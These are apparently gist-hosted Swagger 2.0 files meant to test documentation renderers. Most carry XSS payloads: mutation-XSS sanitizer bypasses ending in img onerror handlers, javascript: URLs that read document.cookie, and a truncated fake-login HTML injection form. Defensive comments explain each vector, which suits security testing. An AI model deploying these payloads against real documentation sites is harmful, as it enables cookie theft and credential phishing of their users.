
{
"url": "https://gist.githubusercontent.com/zenelite123/f1a52d78b8fe885343cd9ca7e95a6b43/raw/105b3cc569e361741b84369171311323db1a6695/test-new.yaml",
"urls": [
{
"url": "https://gist.githubusercontent.com/zenelite123/f1a52d78b8fe885343cd9ca7e95a6b43/raw/105b3cc569e361741b84369171311323db1a6695/test-new.yaml",
"name": "Foo"
}
]
}
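# Swagger 2.0 document whose only unusual field is info.description: it holds
# raw HTML rather than documentation text, so it exercises how a consumer
# renders that field.
swagger: '2.0'
info:
  title: Classic API Resource Documentation
  # Literal block scalar: the markup below reaches the consumer unchanged.
  # The nested form/math/svg/textarea elements, with an attribute value that
  # closes the textarea early, look like a test of HTML-sanitizer re-parsing;
  # the trailing <img onerror=...> is the part that must never reach the DOM.
  # A documentation UI that renders description as HTML has to pass it
  # through an up-to-date sanitizer, and a script-restricting CSP on the docs
  # origin limits the damage if one input slips through.
  # NOTE(review): whether this input is neutralised depends on the renderer
  # and sanitizer versions in use - confirm against the deployed UI.
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml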
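# Swagger 2.0 document with HTML placed in info.description; the rest of the
# visible structure is a single POST operation on "/".
swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  # Plain scalar holding two pieces of markup: a bare <img onerror=...> and a
  # nested form/math/svg/textarea structure ending in a second one.
  # The first is removed by any working HTML sanitizer; the second is only
  # removed if the sanitizer's parse of the nested elements matches the
  # browser's, so it is the case to cover in a renderer regression test.
  # Treat description as untrusted whenever the spec can come from outside
  # the service that hosts the documentation UI.
  description: <img onerror=alert() src=1> <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(2) src=1>"></form>
paths:
  /:
    post:
      # No entries follow in the visible listing, so this parses as null.
      responses: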
{
"url": "https://gist.githubusercontent.com/zenelite123/72274842b61e6abdc0c6a7e4edb62b6f/raw/f436f20513608e8c947d224d8fcb671e2587980a/xss.yaml",
"urls": [
{
"url": "https://gist.githubusercontent.com/zenelite123/72274842b61e6abdc0c6a7e4edb62b6f/raw/f436f20513608e8c947d224d8fcb671e2587980a/xss.yaml",
"name": "Foo"
}
]
}
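# Swagger 2.0 document that places script-bearing values in three fields a
# documentation UI may turn into markup or links: info.description,
# info.termsOfService and securityDefinitions.*.authorizationUrl.
swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    # URL field carrying a javascript: scheme. A consumer should accept only
    # http/https here before using the value as a link target or redirect.
    # In the visible lines this definition has no flow or scopes, which the
    # Swagger 2.0 schema requires for oauth2, so strict schema validation
    # ahead of rendering would reject the document.
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: DOM XSS PoC
  # HTML in a free-text field: nested form/math/svg/style elements with an
  # attribute value that closes the style element early, followed by an
  # <img onerror=...> that reads document.cookie. Sanitize before rendering;
  # HttpOnly session cookies keep this particular read from exposing them.
  description: '<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(document.cookie) src>">'
  # Second javascript: URL, in a field that UIs commonly render as a link.
  # Apply the same scheme allow-list as for authorizationUrl.
  termsOfService: "javascript:alert(document.cookie)"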
{
"url": "https://gist.githubusercontent.com/zenelite123/61360869361ff88d7ce3aec863be7785/raw/227f1d30bb292b1d981b30277236c52acb98ae88/test.yaml",
"urls": [
{
"url": "https://gist.githubusercontent.com/zenelite123/61360869361ff88d7ce3aec863be7785/raw/227f1d30bb292b1d981b30277236c52acb98ae88/test.yaml",
"name": "Test"
}
]
}
swagger: '2.0'
info:
version: 1.0.0
title: Fake Login Page
description: '<div class="login-form">
<div class="heading">
<h1>HTML Injection : Fake Login</h1>
</div>
<div class="form-container">
<form action="https://example.com/login" method="post" class="form-signin">